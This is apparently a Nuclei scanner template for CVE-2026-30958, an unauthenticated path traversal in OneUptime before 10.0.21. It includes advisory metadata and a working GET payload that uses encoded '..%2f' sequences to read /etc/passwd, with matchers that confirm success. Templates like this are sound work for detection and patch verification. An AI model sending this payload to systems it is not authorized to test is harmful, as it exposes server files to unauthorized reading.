id: CVE-2026-30958 info: name: OneUptime < 10.0.21 - Path Traversal author: ashvinctrl,iconnnjka severity: high description: | OneUptime < 10.0.21 contains a path traversal caused by unsanitized componentName parameter in /workflow/docs/:componentName endpoint, letting unauthenticated attackers read arbitrary files from the server filesystem. impact: | Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information. remediation: | Upgrade to version 10.0.21 or later. reference: - https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p2wh-9pw8-hvff - https://nvd.nist.gov/vuln/detail/CVE-2026-30958 - https://github.com/OneUptime/oneuptime classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2026-30958 epss-score: 0.01139 epss-percentile: 0.63251 cwe-id: CWE-22 metadata: verified: true max-request: 1 fofa-query: title="OneUptime" tags: cve,cve2026,oneuptime,lfi,path-traversal,vuln,unauth http: - method: GET path: - "{{BaseURL}}/workflow/docs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a00483046022100dd3dda977d2e3cfd7db34b2378f6a683c5656e251aac1a7e66b3068b87608f77022100a38690d3482156ef3522eae29559206fcbbd455c3ffd9a933bbebf66bce3c9bc:922c64590222798bb761d5b6d8e72950